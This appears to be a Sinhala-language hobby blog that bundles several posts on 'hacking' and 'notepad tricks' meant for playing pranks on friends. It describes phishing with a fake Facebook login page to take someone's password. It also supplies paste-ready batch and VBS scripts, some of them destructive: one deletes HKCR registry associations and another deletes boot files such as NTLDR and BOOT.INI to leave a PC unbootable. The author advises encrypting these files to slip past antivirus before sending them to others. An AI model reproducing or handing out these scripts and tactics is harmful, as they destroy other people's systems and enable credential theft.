Email
Showing posts with label එක එක ලණු. Show all posts
Showing posts with label එක එක ලණු. Show all posts
ඔන්න එහෙනම් අද ඉදන් මම hacking ගැනත් කියලා දෙනවා.මුලින්ම කියන්න ඕනි මමත් තාම hacking ගැන ඉගෙනගන්න නිසා ගොඩක් දේවල් දන්නෙ නෑ. ඒ වුනාට මම දන්න ටික කියලා දෙන්නම්කෝ.............

හරි එහෙනම්... ගොඩක් අය දන්නවනෙ phishing කියන්නෙ මොකක්ද කියලා..හැබැයි ඉතින් දන්නැති අයත් ඇතිනෙ.phishing වලදි කරන්නෙ කාව හරි රවට්ටලා තොරතුරු ගන්න එක.මේකෙදි කරන්නෙ original page එක වගේ fake page එකක් යවන එක. උදාහරණයක් විදියට ඔයාට ඕනිනම් කාගෙහරි facebook එකේ user name එකයි password එකයි ගන්න ඔයා මේ විදියෙ phishing page එකක් එයාට යවලා එයත් ඒකට  අහුවුනොත් ඉතින් වැඩේ ගොඩ... මෙහෙම කොච්චර කිව්වත් හරියන්නෑ ඕක පෙන්නනකම්....


Original Facebook login page
___________________________________________________________________________________

Fake Facebook login page (phishing page)


පේනවනේ...address එක විතරයි වෙනසකට තියෙන්නේ...

ඉතුරුටික බලන්න මෙතනින් යන්න post එක ටිකක් දිග නිසා නැත්නම් blog එක අවුල් යනවා...


S259VEJTCQZQ
හලෝ කස්ටිය ඉතින් කෝමද ඈ.. මමනං ඉතින් වෙනදා වගේම පිස්සු නටනට ඉන්නවා.. ආ කලින් කියන්න අමතක උනානෙ සුභ අලුත් අවුරුද්දක් වේවා හැමෝටම..



අලුත් අවුරුද්දෙ blog එක බලන කස්ටියට මම කියල දෙන්න හදන්නෙ යාලුවන්ට පොඩි අහින්සක මඩ පාරක් ගහලා චූටි fun එකක් ගන්න හැටි ගැන.. මේක කරන්න ගොඩක් ලේසියි link එකේ උඩ නම වෙනස් කරන්න විතරයි ඕනි...

මේ තියෙන්නෙ පළවෙනි එක. කරන්න තියෙන්නෙ ඔය JZero කියල තියෙන තැනට බයිට් පාරක් දෙන්න ඕනි කෙනාගෙ නම දෙන එක.






මේක තමයි දෙවෙනි එක. මේකෙත් අර පළවෙනි එකේ වගේම JZero කියල තියෙන තැනට බයිට් පාරක් දෙන්න ඕනි කෙනාගෙ නම දෙන්න.



එහෙනම් ඉතින් කාවහරි  බයිට් කරන්නකො ඈ... හැබැයි ඉතිං ගුටි කන්න උනොත් එහෙම අපි නෑ ඔන්න.. :P



වෙන post එකක් දාන්නත් හදලා ඔන්න ඔහේ notepad tricks වල දෙවනි කොටස දානවා කියලා හිතුනා...

හරි එහෙනම් පළවෙනි කොටස කියවපු නැති අය මෙතනින් ඒක කියවලා එන්නකෝ......

9. මේකෙන් කරන්නෙ backspace key එක ඉවරයක් නැතුව එබෙන්න ගන්න එක. කොහොමද මාර ආතල් නේද මොනව හරි type කරනකොට මේ වැඩේ උනොත්....:D

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (key.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.
MsgBox “Lets Rumble with techtrickslanka
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


10. මේකත් කලින් එක වගේම තමා. වෙනසකට තියෙන්නෙ මේකෙන්  වැඩකරන්න ගන්නෙ enter key එක.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (key.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

11.  මේකෙන් වෙන damage එකනම් ඉතින් මම කියන්න යන්නෙත් නෑ. හැබැයි ඉතින් මේක එක එකාට දීලා ගුටිකාලා මට බනින්නත් එපා ඔන්න.මමත් ඉතින් ඕක තාම tri කලේ නෑ. කනාවට හරි ඕක කාටහරි දුන්නොත් ඉතින් මටත් කියන්නකො ඕක වැඩද කියලා...:D)

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මොකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)
@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO R.I.P *******.HAVE A
NICE DAY.
GOTO MESSAGE
 12. කීබෝඩ් එකේ ලයිට් ටික තොරණක් වගේ පත්තුවෙන්න ගනියි මේක run කලාම..

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (light.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

13.  මේකත් ඉතින් නරකම නෑ.. සම්පූර්ණ HDD එකම එක පාරින් format කරගන්න ඕනිනම් මෙන්න වැඩේ..

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .exe කියලා දීලා save කරන්න. (format.exe වගේ)

            01001011000111110010010101010101010000011111100000

14. කාගෙනන්වත් කරදරයක් නැතුව මොකාටවත් ඔන්ලයින් පේන්නෙත් නැතුව register වෙන්නෙත් නැතුව chat කරන්න ඕනිනම් පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න.(LAN Netwrok වල විතරයි වැඩ)  (messanger.bat වගේ)

@echo off
:A
Cls
echo Tech Tricks Lanka Messenger
echo Techtrickslanka.blogspot.com
set /p n=User IP:
set /p m=Your Message:
net send %n% %m%
Pause
Goto A
 දැන් ඉතින් user කියන තැනට message එක යවන්න ඕනි කෙනාගෙ ip එක ගහල message එක යවන්න තමා තියෙන්නෙ. ip එක දන්නැත්නම් what is my ip එකෙන් බලාගන්න.

 එහෙනම් ඉතින් මම යනවා........අදහසක් නම් අනිවාර්යෙන් දාගෙනම යන්න හොදේ...............



ඔන්න කස්ටියට මම ගෙනාවා Notepad tricks ටිකක්.....මේවත් ඉතින් යාලුවො අන්දන්න පාවිච්චි කරන්න බැරිකමක් නෑ....:D

1. Matrix Effect එකක්.....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (matrix.bat වගේ)
@echo off
color 02
:techtrickslanka.blogspot.com
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto techtrickslanka.blogspot.com
 
2. මේ script එක open කලාම Computer එක පිස්සු නටන්න ගන්නවා...

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (virus.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "techtrickslanka.blogspot.com"
loop




 3. මෙකෙන් වෙන්නෙ CD/DVD drive එක ඉවරයක් නැතුව ඇරෙන්නයි වැහෙන්නයි ගන්න එක.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (virus.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

4. මේක නම් අම්බානෙට තදවෙන seen එකක්. එකදිගටම මේ පහල තියෙන message ටික එන්න පටන් ගන්නවා.වැඩේ නවත්තගන්න ඕනිනම් computer එක restart කරන්න වෙයි.....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (message.bat වගේ)

@ECHO off
:Begin
msg * Hi
msg * Go to techtrickslanka.blogspot.com
msg * Please.......
msg * Go................. !
GOTO BEGIN

5.  මේ code එකෙන් පුලුවන් message එකක් එක්ක computer එක shutdown කරල දාන්න.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)

@echo off
msg * techtrickslanka.blogspot.com.
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeeeeeee” -s

6. මෙකෙන් වෙන්නේ notepad එකේ word එකේ එහෙම හැමතිස්සෙම  techtrickslanka.blogspot.com (ඔයාලා මෙතනට දෙන message එක) කියලා type වෙන්න ගන්නවා....

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (word.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.


Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “techtrickslanka.blogspot.com.
loop

7.  මේකෙන් වෙන්නෙ computer එක හිරවෙන තරමට notepad windows එකදිගට open වෙන එක.........


පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (notepad.bat වගේ)


@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top

8. අම්මෝ දැන්නම් අතත් රිදෙනවා type කරලම. තව  Notepad tricks ගොඩක් තියෙනවා මම ඒවා පස්සෙ දාන්නම් කවනම් type කරන්න බැරියෝ.......ඔන්න අන්තිමට හොදම එකක් දීලා යන්නම්කෝ..මේකෙන් පුලුවන් ඉතින් computer එකක් format කරල මිසක් ආයෙ ගොඩදාන්න බැරි විදියට අවුල් කරල දාන්න. නිකං කහනව කහනව වගේනම් ඉතින් තමන්ගෙ computer එකේම run කරල බැලුවත් අවුලක් නෑ..:D

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මොකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)


@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

වයිරස් ගාඩ් වලින් අල්ලනවනම් file එක crypt කරලා යවන්න...crypt කරන හැටි දන්නෙ නැති අයට පස්සෙ දවසක ඒ ගැන කියලා දෙන්නම්...


එහෙනම් ඉතින් මම යනවා... Post එක කොහොමද කියලා අදහසකුත් දාන්න.......


චූටි පැම්ණිල්ලකුත් ආවා blog එකේ ගොඩක් තියෙන්නෙ sanandreas ගැන කියලා...ඉතින් game ගැන post දැමිල්ල මම ටික දවසකට නවත්තනවා..නැත්නම් කස්ටියට එපාවෙයිනේ.....ඉස්සරහට හොද hacking tutorials ටිකකුත් දාන්න මම බලාපොරොත්තු වෙනවා...

හරි එහෙනම්..හැමෝම මාර කැමතියිනෙ යාලුවන්ට ලණු දෙන්න..එහෙම කැමති අයට ඔන්න මම නියම soft එකක් හැදුවා.සමහර එවුන්ට මාර අමාරුවක්නෙ තියෙන්නෙ facebook account hack කරන්න.අපි ගිහින් කාටහරි කිව්වොත් මචන් නියමෙට වැඩකරන facebook account hack කරන්න පුලුවන් soft එකක් තියෙනවා කිව්වොත් එහෙම මටත් දියන් කියාගෙන වැඳගෙනනෙ එන්නෙ.

මේකත් ඉතින් ඔය  facebook hack කරන්න පුලුවන් කියල පේන්න විතරක් තියෙන soft එකක්. මේකෙන් කරන්න පුලුවන් hack කිරිල්ලක් නෑ යාලුවන්ව නියමෙට බයකරන්නනම් පුලුවන්....:D


(link updated 2013/3/25)

password : techtrickslanka.blogspot.com

Virus scan report : click here to view

ඕක CAT-QuickHeal , Malwarebytes, SUPERAntiSpyware කියන Antivirus වලින් virus එකක් කියලා පෙන්නනවා ඒ වුනාට ඕකෙ ඇති virus එකක් නෑ..ඒ ගැන මට 100% විශ්වාසයි.

හරි එහෙනම් දැන් ඕක Download කරගෙන run කරලා බලන්නකෝ.හැබැයි post එක කියවලා ඉවරවෙනකම් hack button එකනම් ඔබන්න එපා.........

හරි දැන් කට්ටිය බලන් ඇතිනෙ hack button එක එබුවාම මොකද වෙන්නෙ කියලා..ඒක ඔබපු හැටියෙ එනවා Error! කියලා message එකක්..ඊට පස්සෙනම් ඉතින් program එක close කලත් වැඩක් නෑ Windows is formatting the system drive කියලා message එකක් ඇවිත් Format complete ! , Your system is crashed! කියලා message දෙකකුත් එනවා...:D ඊට පස්සෙ computer එක auto shutdown වෙලා යනවා..

හැබැයි ඉතින් ආයෙ computer එක ඔන් උනාම අගේට වැඩ...:D

මෙක තව පොඩ්ඩක් හොදට හදාගන්න ඕනි කෙනෙක් ඉන්නවනම් පහලින් comment එකක් දාන්නකො මම project එක upload කරන්නම්.

එහෙනම් ඉතින් ඕක කාටහරි දීල බලන්න...හැබැයි ගුටි කන්න උනොත්නම් අපි නෑ ඔන්න..

යනගමන් එහෙනම් Post එක කොහොමද කියලා අදහසකුත් දාගෙනම යන්නකෝ....................
තවත් එකක් නොව සියල්ලටම එකක්.....